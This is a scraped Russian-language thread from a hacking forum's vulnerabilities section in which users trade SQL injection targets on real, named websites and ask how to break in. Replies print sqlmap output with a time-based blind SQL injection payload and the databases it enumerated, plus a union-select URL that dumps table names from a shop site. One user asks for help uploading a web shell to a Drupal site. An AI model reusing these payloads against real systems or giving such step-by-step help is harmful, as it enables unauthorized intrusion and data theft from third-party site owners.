HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #751  
Старый 23.10.2015, 10:08
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами: 5785526

Репутация: 6
По умолчанию

Код HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать?
 
Ответить с цитированием

  #752  
Старый 23.10.2015, 13:32
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Цитата:
Сообщение от R3hab  

Код HTML:
http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
что можно сделать?
sqlmap берет

Код:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
---
[12:26:48] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.6.0, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
Базы:

available databases [3]:
[*] elektroline
[*] information_schema
[*] test
 
Ответить с цитированием

  #753  
Старый 23.10.2015, 18:51
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511'

кто зальется, сообщите как?
 
Ответить с цитированием

  #754  
Старый 24.10.2015, 00:39
Roger96
Новичок
Регистрация: 13.10.2015
Сообщений: 18
С нами: 5570966

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #755  
Старый 24.10.2015, 00:40
xivi00
Познающий
Регистрация: 23.11.2013
Сообщений: 46
С нами: 6563126

Репутация: 0
По умолчанию

http://www.navistory.kr/shop/m_navi...M+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+ x)a)

sqlmap как в нем таблици вытащить что то чар не пагет(
 
Ответить с цитированием

  #756  
Старый 24.10.2015, 01:05
ButilkaSoka
Новичок
Регистрация: 04.06.2015
Сообщений: 22
С нами: 5759606

Репутация: 0
По умолчанию

Цитата:
Код:
http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+--
 
Ответить с цитированием

  #757  
Старый 24.10.2015, 01:16
TopTG
Новичок
Регистрация: 14.10.2015
Сообщений: 10
С нами: 5569526

Репутация: 0
По умолчанию

Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
 
Ответить с цитированием

  #758  
Старый 24.10.2015, 06:30
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Цитата:
Сообщение от TopTG  

Ребята подскажите, есть сайт на Drupal 7.34. Нет доступа с правами администратора но есть доступ в качестве юзера. Есть ли у этой версии какие то уязвимости? как получить доступ к админу? хочу залить шелл и получить доступ к файлам.
.SpoilerTarget" type="button">Spoiler: Смотри тут
https://www.cvedetails.com/vulnerab...387/version_id-181083/Drupal-Drupal-7.34.html
 
Ответить с цитированием

  #759  
Старый 24.10.2015, 13:27
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами: 5785526

Репутация: 6
По умолчанию

Код HTML:
http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*
как то можно использовать эту ошибку?
 
Ответить с цитированием

  #760  
Старый 24.10.2015, 21:46
TopTG
Новичок
Регистрация: 14.10.2015
Сообщений: 10
С нами: 5569526

Репутация: 0
По умолчанию

Цитата:
Сообщение от kacergei  
спасибо за ответ. как я понял по ссылке список уязвимость. но как человек имеющий базовые знания но первый раз сталкивающийся с этим, можете в качестве примеров описать коротко по шагам как это применять, по примерам я пойму не совсем чайник.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...